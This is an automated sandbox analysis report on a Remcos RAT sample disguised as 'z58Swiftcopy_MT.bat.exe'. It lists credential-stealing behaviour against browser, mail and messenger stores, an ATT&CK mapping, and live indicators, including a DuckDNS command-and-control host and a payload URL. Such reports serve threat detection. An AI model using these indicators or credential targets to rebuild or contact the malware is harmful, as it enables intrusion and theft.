                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerY
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A18000.00000004.00000020.00020000.00000000.sdmp, logs.dat.2.drBinary or memory string: [Program Manager]
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerles\*/
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerG
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerC
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program ManagerKJ
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerinutes }
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerx
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manageru
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managero^
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056784519.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager1
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager2
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager:J
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410654098.0000000002A88000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Managerr
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager9
                  Source: z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager89b
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72933 cpuid 2_2_33A72933
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeQueries volume information: C:\ VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 2_2_33A72264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,2_2_33A72264
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 4_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy,4_2_004082CD
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: 0_2_0040330D EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_0040330D
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                  Stealing of Sensitive Information

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32066409158.0000000032B2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410654098.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410560082.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\places.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\ol7uiqa8.default-release\key4.dbJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Tries to steal Instant Messenger accounts or passwords
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic SaltJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\AccountsJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\PaltalkJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: ESMTPPassword4_2_004033F0
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword4_2_00402DB3
                  Source: C:\Users\user\Desktop\z58Swiftcopy_MT.bat.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword4_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 2804, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002AF1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436005878.0000000002AE4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28485763517.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056784519.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32066409158.0000000032B2F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410654098.0000000002A77000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28486047899.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28453587511.0000000002AE0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410560082.0000000002AEF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: z58Swiftcopy_MT.bat.exe PID: 5524, type: MEMORYSTR
                  Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts11
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		1
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		1
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		Boot or Logon Initialization Scripts1
                  Access Token Manipulation                  		2
                  Obfuscated Files or Information                  		11
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)112
                  Process Injection                  		1
                  Software Packing                  		2
                  Credentials in Registry                  		3
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
                  DLL Side-Loading                  		1
                  Credentials In Files                  		128
                  System Information Discovery                  		Distributed Component Object Model11
                  Input Capture                  		2
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
                  Masquerading                  		LSA Secrets331
                  Security Software Discovery                  		SSH2
                  Clipboard Data                  		213
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts12
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials12
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync4
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job112
                  Process Injection                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1586058 Sample: z58Swiftcopy_MT.bat.exe Startdate: 08/01/2025 Architecture: WINDOWS Score: 100 32 wealthabundance01.duckdns.org 2->32 34 teldrum.ro 2->34 36 geoplugin.net 2->36 50 Suricata IDS alerts for network traffic 2->50 52 Found malware configuration 2->52 54 Multi AV Scanner detection for submitted file 2->54 58 6 other signatures 2->58 8 z58Swiftcopy_MT.bat.exe 1 37 2->8         started        signatures3 56 Uses dynamic DNS services 32->56 process4 file5 24 C:\Users\user\AppData\Local\...\nsm9317.tmp, data 8->24 dropped 26 C:\Users\user\AppData\...\Objektsprogs.Jrg119, data 8->26 dropped 28 C:\Users\user\AppData\Local\...\System.dll, PE32 8->28 dropped 60 Detected unpacking (changes PE section rights) 8->60 62 Tries to steal Mail credentials (via file registry) 8->62 64 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 8->64 66 2 other signatures 8->66 12 z58Swiftcopy_MT.bat.exe 4 17 8->12         started        signatures6 process7 dnsIp8 38 wealthabundance01.duckdns.org 43.226.229.196, 3981, 49748, 49749 SOFTLAYERUS Hong Kong 12->38 40 teldrum.ro 109.99.162.14, 443, 49747 RTDBucharestRomaniaRO Romania 12->40 42 geoplugin.net 178.237.33.50, 49750, 80 ATOM86-ASATOM86NL Netherlands 12->42 30 C:\ProgramData\remcos\logs.dat, data 12->30 dropped 68 Tries to detect Any.run 12->68 70 Maps a DLL or memory area into another process 12->70 72 Installs a global keyboard hook 12->72 17 z58Swiftcopy_MT.bat.exe 1 12->17         started        20 z58Swiftcopy_MT.bat.exe 1 12->20         started        22 z58Swiftcopy_MT.bat.exe 2 12->22         started        file9 signatures10 process11 signatures12 44 Tries to steal Instant Messenger accounts or passwords 17->44 46 Tries to harvest and steal browser information (history, passwords, etc) 17->46 48 Tries to steal Mail credentials (via file / registry access) 20->48

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  z58Swiftcopy_MT.bat.exe21%ReversingLabsWin32.Trojan.Sonbokli
                  z58Swiftcopy_MT.bat.exe100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Temp\nsb9327.tmp\System.dll0%ReversingLabs

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://www.gopher.ftp://ftp.0%Avira URL Cloudsafe
                  http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.0%Avira URL Cloudsafe
                  wealthabundance01.duckdns.org0%Avira URL Cloudsafe
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                  http://ocsp.sca1b.amazontrust.com060%Avira URL Cloudsafe
                  http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
                  https://teldrum.ro/PmprpeY34.bin0Pf0%Avira URL Cloudsafe
                  http://www.imvu.comr0%Avira URL Cloudsafe
                  http://nsis.sf.net/NSIS_Error0%Avira URL Cloudsafe
                  http://www.imvu.comata0%Avira URL Cloudsafe
                  https://teldrum.ro/PmprpeY34.bin0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  wealthabundance01.duckdns.org
                  		43.226.229.196
                  		truetrue
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		high
                      teldrum.ro
                      		109.99.162.14
                      		truefalse
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        wealthabundance01.duckdns.orgtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://teldrum.ro/PmprpeY34.binfalse
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        https://cdnjs.cloudflare.com/ajax/libs/gsap/3.5.1/gsap.min.jsbhvD739.tmp.3.drfalse
                          		high
                          http://www.imvu.comrz58Swiftcopy_MT.bat.exe, 00000002.00000002.32067121242.0000000033A40000.00000040.10000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          https://account.live.com/Resources/images/Microsoft_Logotype_White_4MYDQRab31HKDWWN-1HafA2.svgbhvD739.tmp.3.drfalse
                            		high
                            https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/k3.jpgbhvD739.tmp.3.drfalse
                              		high
                              https://acctcdn.msftauth.net/oneds_MC5gQfpbTUjLu60sQCwU1w2.js?v=1bhvD739.tmp.3.drfalse
                                		high
                                https://s1.adform.net/Banners/Elements/Files/2070608/10170131/bvpath_258/pics/footer.pngbhvD739.tmp.3.drfalse
                                  		high
                                  https://ajax.aspnetcdn.com/ajax/jquery/jquery-3.3.1.min.jsbhvD739.tmp.3.drfalse
                                    		high
                                    https://csp.withgoogle.com/csp/ads-programmablebhvD739.tmp.3.drfalse
                                      		high
                                      http://inference.location.live.com11111111-1111-1111-1111-111111111111https://partnernext-inference.z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      https://teldrum.ro/PmprpeY34.bin0Pfz58Swiftcopy_MT.bat.exe, 00000002.00000002.32056632494.0000000002A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                      • Avira URL Cloud: safe
                                      		unknown
                                      http://www.nirsoft.netz58Swiftcopy_MT.bat.exe, 00000003.00000002.28481442526.0000000000193000.00000004.00000010.00020000.00000000.sdmpfalse
                                        		high
                                        https://aefd.nelreports.net/api/report?cat=bingaotakbhvD739.tmp.3.drfalse
                                          		high
                                          https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC0ee8c30f496b428a91d7f3289a2b8a2bhvD739.tmp.3.drfalse
                                            		high
                                            https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RC784fc6783b2f45a09cb8efa184cc684bhvD739.tmp.3.drfalse
                                              		high
                                              https://deff.nelreports.net/api/report?cat=msnbhvD739.tmp.3.drfalse
                                                		high
                                                https://account.live.com/Resources/images/AppCentipede/AppCentipede_Microsoft_white_ufRYlllWOw4YyDRibhvD739.tmp.3.drfalse
                                                  		high
                                                  http://www.gopher.ftp://ftp.z58Swiftcopy_MT.bat.exe, 00000002.00000001.27691456198.0000000000649000.00000020.00000001.01000000.00000007.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://www.google.com/chrome/z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                    		high
                                                    http://cdp.thawte.com/ThawteRSACA2018.crl0LbhvD739.tmp.3.drfalse
                                                      		high
                                                      https://cxcs.microsoft.net/static/public/tips/neutral/6c6740da-0bfe-48a6-83fc-c98d1919b060/3addf02b7bhvD739.tmp.3.drfalse
                                                        		high
                                                        https://csp.withgoogle.com/csp/report-to/active-view-scs-read-write-aclbhvD739.tmp.3.drfalse
                                                          		high
                                                          https://static-ecst.licdn.com/apc/trans.gif?ae11829b3d6e895a2a3516fac536a339bhvD739.tmp.3.drfalse
                                                            		high
                                                            https://acctcdn.msftauth.net/confirmidentity_9m6e3jBPkyZiRdJxglsYsA2.js?v=1bhvD739.tmp.3.drfalse
                                                              		high
                                                              http://geoplugin.net/json.gpXNz58Swiftcopy_MT.bat.exe, 00000002.00000003.28436040290.0000000002A9A000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000002.32056932719.0000000002A9D000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000002.00000003.29410588585.0000000002A9C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://crls.pki.goog/gts1c3/QOvJ0N1sT2A.crl0bhvD739.tmp.3.drfalse
                                                                  		high
                                                                  https://www.msn.combhvD739.tmp.3.drfalse
                                                                    		high
                                                                    https://sync-t1.taboola.com/sg/criteortb-network/1/rtb-h/?taboola_hm=b2df1cf6-0873-4430-916b-9612e80bhvD739.tmp.3.drfalse
                                                                      		high
                                                                      https://static2.sharepointonline.com/files/fabric/assets/fonts/segoeui-westeuropean/segoeui-light.wobhvD739.tmp.3.drfalse
                                                                        		high
                                                                        https://btloader.com/tag?o=6208086025961472&upapi=truebhvD739.tmp.3.drfalse
                                                                          		high
                                                                          http://www.imvu.comataz58Swiftcopy_MT.bat.exe, 00000005.00000003.28455900413.0000000000AFD000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000003.28455853934.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          • Avira URL Cloud: safe
                                                                          		unknown
                                                                          https://use.typekit.net/af/eaf09c/000000000000000000017703/27/d?subset_id=2&fvd=n7&v=3bhvD739.tmp.3.drfalse
                                                                            		high
                                                                            https://acctcdn.msftauth.net/hostfooterpackage_FOuGbot8yZGKyYkh5yNQBA2.js?v=1bhvD739.tmp.3.drfalse
                                                                              		high
                                                                              https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_pad%2bhvD739.tmp.3.drfalse
                                                                                		high
                                                                                http://www.imvu.com/z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456329037.000000000019C000.00000004.00000010.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCe691e5baee9945259179326d0658843bhvD739.tmp.3.drfalse
                                                                                    		high
                                                                                    http://ocsp.sca1b.amazontrust.com06bhvD739.tmp.3.drfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    		unknown
                                                                                    http://certs.godaddy.com/repository/1301bhvD739.tmp.3.drfalse
                                                                                      		high
                                                                                      http://i.pki.goog/r1.crt0bhvD739.tmp.3.drfalse
                                                                                        		high
                                                                                        http://www.imvu.comz58Swiftcopy_MT.bat.exe, z58Swiftcopy_MT.bat.exe, 00000005.00000003.28455900413.0000000000AFD000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000002.28456405187.0000000000400000.00000040.80000000.00040000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000005.00000003.28455853934.0000000000AFD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://acctcdn.msftauth.net/accountcorepackage_hSxsZy9Ymkhjr2rMMwej_g2.js?v=1bhvD739.tmp.3.drfalse
                                                                                            		high
                                                                                            http://geoplugin.net/json.gpCnz58Swiftcopy_MT.bat.exe, 00000002.00000003.28390975053.0000000002A98000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              http://ocsp.rootca1.amazontrust.com0:bhvD739.tmp.3.drfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              		unknown
                                                                                              https://certs.godaddy.com/repository/0bhvD739.tmp.3.drfalse
                                                                                                		high
                                                                                                https://pki.goog/repository/0bhvD739.tmp.3.drfalse
                                                                                                  		high
                                                                                                  https://www.msn.com/bhvD739.tmp.3.drfalse
                                                                                                    		high
                                                                                                    http://i.pki.goog/wr2.crt0bhvD739.tmp.3.drfalse
                                                                                                      		high
                                                                                                      https://assets.adobedtm.com/5ef092d1efb5/4d1d9f749fd3/2b6d8bd51279/RCd01d50cad19649bf857a22be5995480bhvD739.tmp.3.drfalse
                                                                                                        		high
                                                                                                        http://cacerts.thawte.com/ThawteRSACA2018.crt0bhvD739.tmp.3.drfalse
                                                                                                          		high
                                                                                                          http://crl.godaddy.com/gdroot-g2.crl0FbhvD739.tmp.3.drfalse
                                                                                                            		high
                                                                                                            http://crl.rootg2.amazontrust.com/rootg2.crl0bhvD739.tmp.3.drfalse
                                                                                                              		high
                                                                                                              https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chrom0;ord=8672137916610;z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                		high
                                                                                                                https://account.live.com/Resources/images/favicon.icobhvD739.tmp.3.drfalse
                                                                                                                  		high
                                                                                                                  http://nsis.sf.net/NSIS_Errorz58Swiftcopy_MT.bat.exefalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  		unknown
                                                                                                                  https://www.msn.com/?ocid=iehpz58Swiftcopy_MT.bat.exe, 00000003.00000003.28474962908.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28475198040.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28476240349.0000000002271000.00000004.00000020.00020000.00000000.sdmp, z58Swiftcopy_MT.bat.exe, 00000003.00000003.28474770977.0000000002A91000.00000004.00000020.00020000.00000000.sdmp, bhvD739.tmp.3.drfalse
                                                                                                                    		high
